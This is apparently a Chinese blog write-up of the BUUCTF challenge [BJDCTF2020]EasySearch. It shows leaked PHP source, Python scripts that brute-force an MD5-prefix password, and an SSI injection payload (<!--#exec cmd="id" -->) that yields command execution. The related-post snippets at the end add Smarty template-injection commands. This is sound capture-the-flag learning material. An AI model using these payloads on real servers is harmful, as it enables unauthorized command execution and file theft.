首页 > 其他分享 >BUUCTF:[BJDCTF2020]EasySearch

BUUCTF:[BJDCTF2020]EasySearch

时间:2023-06-19 22:04:42浏览次数:53  
标签:shtml hashlib BUUCTF EasySearch res chars file BJDCTF2020 md5


BUUCTF:[BJDCTF2020]EasySearch_BUUCTF


index.php.swp发现源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

首先验证password,然后username的值可控,但是写入.shtml文件,无法控制这个$file_html,查阅.shtml文件

BUUCTF:[BJDCTF2020]EasySearch_php_02


可以看到.shtml文件可以执行命令,格式:

<!--#exec cmd="id" -->

验证password脚本简单跑一下即可

import hashlib

chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for c1 in chars:
	for c2 in chars:
		for c3 in chars:
			for c4 in chars:
				res = c1 + c2 + c3 + c4
				md5_res = hashlib.md5(res.encode()).hexdigest()
				if md5_res[0:6] == '6d0bc1':
					print('{} {}'.format(res, md5_res))

或者用数字更快

import hashlib

for n in range(10000000):
	md5_n = hashlib.md5(str(n).encode()).hexdigest()
	if md5_n[0:6] == '6d0bc1':
		print('{} {}'.format(n, md5_n))
PS C:\Users\Administrator\Downloads> python .\code.py
2020666 6d0bc1153791aa2b4e18b4f344f26ab4
2305004 6d0bc1ec71a9b814677b85e3ac9c3d40
9162671 6d0bc11ea877b37d694b38ba8a45b19c
RhPd 6d0bc1e4a7920842ccce734925903e17

payload

username=<!--#exec cmd="id" -->&password=RhPd

运行之后在响应头反馈了访问URL

BUUCTF:[BJDCTF2020]EasySearch_BUUCTF_03


访问即可发现成功执行

BUUCTF:[BJDCTF2020]EasySearch_html_04


在当前目录的上一级发现flag

BUUCTF:[BJDCTF2020]EasySearch_html_05


直接读取即可

BUUCTF:[BJDCTF2020]EasySearch_BUUCTF_06


标签:shtml,hashlib,BUUCTF,EasySearch,res,chars,file,BJDCTF2020,md5
From: https://blog.51cto.com/u_16159500/6517840

相关文章

  • BUUCTF:[CISCN2019 华东南赛区]Web11
    注意到了banner中信息说是smarty,并且将XFF输出到页面直接尝试Smarty模板注入{$smarty.version}Smarty3官方手册:https://www.smarty.net/docs/zh_CN/language.function.if.tpl{ifsystem('ls-lha/')}{/if}{ifsystem('cat/flag')}{/if}......
  • BUUCTF:[WesternCTF2018]shrine
    https://buuoj.cn/challenges#[WesternCTF2018]shrineimportflaskimportosapp=flask.Flask(__name__)app.config['FLAG']=os.environ.pop('FLAG')@app.route('/')defindex(): returnopen(__file__).read() @app.route(&......
  • BUUCTF:[SUCTF 2019]Pythonginx
    @app.route('/getUrl',methods=['GET','POST'])defgetUrl():url=request.args.get("url")host=parse.urlparse(url).hostnameifhost=='suctf.cc':return"我扌yourproblem?111&q......
  • BUUCTF: [网鼎杯 2020 朱雀组]Nmap
    https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202020%20%E6%9C%B1%E9%9B%80%E7%BB%84]Nmap会把扫描结果导出到一个文件里面给参数f传一个错误的文件名通过报错发现使用了simplexml_load_file(),那说明导出的文件格式是xml的使用输出格式可以将指定的内容输出到指定......
  • BUUCTF:[极客大挑战 2019]BabySQL
    题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示使用Burp进行SQL过滤字符的Fuzz这些长度为726响应内容是Inputyourusernameandpass......
  • BUUCTF:zip
    题目地址:https://buuoj.cn/challenges#zip很多压缩包,但是里面的内容非常小,小于5字节,可以尝试使用CRC32爆破得到其内容先以out0.zip做个例子,out0.zip的CRC32校验码为:0x75f90d3aPSD:\Tools\Misc\crc32>python.\crc32.pyreverse0x75f90d3a4bytes:{0x7a,0x35,0x42,0x7a}ve......
  • BUUCTF:梅花香自苦寒来
    题目地址:https://buuoj.cn/challenges#%E6%A2%85%E8%8A%B1%E9%A6%99%E4%B9%8B%E8%8B%A6%E5%AF%92%E6%9D%A5题目如下:使用010editor打开在图片结尾FFD9后存在一大串十六进制,把这些字符复制出来,将十六进制转为字符十六进制转字符:https://coding.tools/tw/hex-to-ascii类似坐标,可......
  • BUUCTF:刷新过的图片
    题目地址:https://buuoj.cn/challenges#%E5%88%B7%E6%96%B0%E8%BF%87%E7%9A%84%E5%9B%BE%E7%89%87F5隐写,利用工具:F5-steganography:https://github.com/matthewgao/F5-steganography得到的output.txt明显是个zip文件修改后缀为zipzip伪加密解压得到flagflag{96efd0a2037d06f34199......
  • BUUCTF:面具下的flag
    题目地址:https://buuoj.cn/challenges#%E9%9D%A2%E5%85%B7%E4%B8%8B%E7%9A%84flag题目如下:binwalk分析,发现有隐藏了zip,foremost分离得到一个压缩包zip伪加密解压得到flag.vmdkvmdk文件可以用7z解压7zxflag.vmdk-o./第一部分flag在key_part_one/NUL++++++++++[->+++++++++......
  • BUUCTF:qr
    题目地址:https://buuoj.cn/challenges#qrFlag{878865ce73370a4ce607d21ca01b5e59}......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99